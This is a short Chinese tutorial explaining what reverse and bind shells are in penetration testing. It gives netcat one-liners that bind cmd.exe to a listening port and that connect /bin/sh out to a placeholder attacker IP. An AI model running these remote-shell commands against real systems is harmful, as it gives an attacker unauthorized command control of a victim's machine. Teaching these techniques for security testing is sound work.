反弹Shell是一种在渗透测试和攻击过程中常用的技术,通过这种技术,攻击者可以在受害者机器上执行命令并获取一个远程控制的Shell。具体实现方式是受害者机器主动发起一个连接到攻击者的机器上,通常是通过网络连接(比如TCP),然后攻击者通过这个连接向受害者机器发送命令,从而实现对受害者系统的控制。这种方法绕过了防火墙和其他安全机制的限制,因为它是受害者机器主动发起的连接。

Shell

Shell是一个命令行解释器,它为用户提供了一个向Linux内核发送请求以便运行程序的界面系统

反弹Shell

Reverse Shell,就是控制端首先监听某个 TCP/UDP 端口,然后被控制端向这个端口发起一个请求,同时将自己命令行的输入输出转移到控制端,从而控制端就可以输入命令来控制被控端了。
点击,访问大佬博客

正向连接

本地监听端口

Linux控制Windows,Windows绑定SH到本地1234监听端口,Linux主动连接目标1234

1
2
Windows: nc -e cmd.exe -lvp 1234
Linux: ncat x.x.x.x(对方服务器IP) 1234

反向连接

远程监听端口

Windows控制Linux,Linux绑定SH到对方服务器1234端口,Windows监听本地端口1234

1
2
Linux: ncat x.x.x.x(对方服务器IP) -e /bin/sh
Windows: nc -lvnp 1234